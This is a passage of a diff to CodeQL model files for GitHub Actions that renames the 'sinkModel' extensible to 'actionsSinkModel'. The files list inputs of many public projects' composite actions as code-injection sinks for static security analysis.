@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml index f29c52b1bf5b..72772ae47cf7 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] - ["braintree/braintree-android-drop-in", "*", "input.signing_file_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml index 43745006f8db..43cc1e0187ea 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] - ["braintree/braintree/android", "*", "input.module", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml index 9289afb744f9..7c80b7e6eda6 100644 --- a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] - ["broadinstitute/gatk", "*", "input.repo-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml index 9729f9668138..1f7b69e6254a 100644 --- a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] - ["canonical/multipass", "*", "input.release-branch-re", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml index 92c259539443..7879a7903b41 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] - ["chia-network/actions", "*", "input.role_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml index c572c11ada4b..dbbd4c720ca4 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml index 1819f4f716e1..f99698b19924 100644 --- a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] - ["chipsalliance/chisel", "*", "input.file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml index 620100dd2d9a..a98a135d6b43 100644 --- a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] - ["chocobozzz/peertube", "*", "input.knownHosts", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml index dfb08d260583..3ebb5e7acb32 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] - ["cilium/cilium-cli", "*", "input.binary-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml index a99ccc9e4776..b26aa6ea48b3 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] - ["cilium/cilium", "*", "input.lb-acceleration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml index 3a1e7b9d3366..683965e13d20 100644 --- a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] - ["citusdata/citus", "*", "input.pg_major", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml index c15c1fac0068..9358c895f3c2 100644 --- a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] - ["clerk/javascript", "*", "input.auth-password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml index b0c787fa378f..8233e5066033 100644 --- a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] - ["cloud-custodian/cloud-custodian", "*", "input.bucket-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml index 86278889fdf1..2aea730db7e3 100644 --- a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml index 4bf92a251235..b03d23918825 100644 --- a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml index 79c13504faba..9db70f02db4e 100644 --- a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coder/coder", "*", "input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml index 45ac61c8ef9d..8cea15ac9e11 100644 --- a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml index ce546fceb4bb..766ec5155517 100644 --- a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] - ["commaai/openpilot", "*", "input.docker_hub_pat", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml index b34c6d46da3a..13ee2f4e7a87 100644 --- a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] - ["conan-io/conan-center-index", "*", "input.reviewers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml index f87e0c02529c..0cf05c2273bd 100644 --- a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] - ["corretto/corretto-8", "*", "input.upstream", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml index 88348f05cd0d..7f2622feecd8 100644 --- a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml index 76fe3bed4729..3aa8c3bc6495 100644 --- a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml index bf1a498d7a08..b79317db9c8a 100644 --- a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml index b985d87f7e19..843e0d20b98a 100644 --- a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] - ["cvc5/cvc5", "*", "input.macos-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml index 8e7cdd0308c9..2a0fd3ac371d 100644 --- a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] - ["d2l-ai/d2l-en", "*", "input.work-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml index cf30d0d19ccc..3ef29cc9b84f 100644 --- a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] - ["danysk/build-check-deploy-gradle-action", "*", "input.deploy-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml index 5414a755179c..71d2012eb029 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] - ["datadog/dd-trace-dotnet", "*", "input.baseImage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml index 97a3bfa026e1..a67aeb905958 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] - ["datadog/dd-trace-go", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml index 81672e855578..1f5dd108f910 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] - ["datadog/dd-trace-js", "*", "input.init-image-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml index b4fdfaf273df..ea4a2a2a3c76 100644 --- a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] - ["datafuselabs/databend", "*", "input.dirs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml index 6f1043073d8e..29973ccdbd74 100644 --- a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] - ["davatorium/rofi", "*", "input.windowmode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml index f9244c448580..2db70ffea663 100644 --- a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml index 36332c5678d4..8a4273e8cafd 100644 --- a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml index c246e5de06f6..de09b35f1d46 100644 --- a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml index 13c0093fe4ac..91e6268e6140 100644 --- a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml index 49b226de1e80..777212d9a0a6 100644 --- a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] - ["devexpress/devextreme", "*", "input.result", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml index 9a6e0b88ba2c..8cc0ab83a420 100644 --- a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] - ["diggerhq/digger", "*", "input.google-auth-credentials", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml index 4f88855a5616..f1244bdd5dec 100644 --- a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] - ["diku-dk/futhark", "*", "input.slurm-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml index 5683d28567f4..37814510c8c4 100644 --- a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml index 424c7241bcfc..48e40c36beaa 100644 --- a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] - ["dnsjava/dnsjava", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml index 37295f2cf6c0..0edb2c5f8cdc 100644 --- a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml index e7c767d2dce1..61210d17abb9 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml index 7f78690f6396..22dc1a406293 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml index ba1beace1704..b2888b571a8a 100644 --- a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] - ["dragonflydb/dragonfly", "*", "input.filter", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml index 63085c045d0a..bc188d91f1bb 100644 --- a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml +++ b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"] - ["drawpile/drawpile", "*", "input.path", "output.path", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml index d6ee6c8bb7d2..d5defe67401e 100644 --- a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] - ["eksctl-io/eksctl", "*", "input.email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml index 83951f43c635..d97fedbed130 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] - ["elastic/apm-agent-dotnet", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml index 397ab0838090..e22c29b09f11 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml 
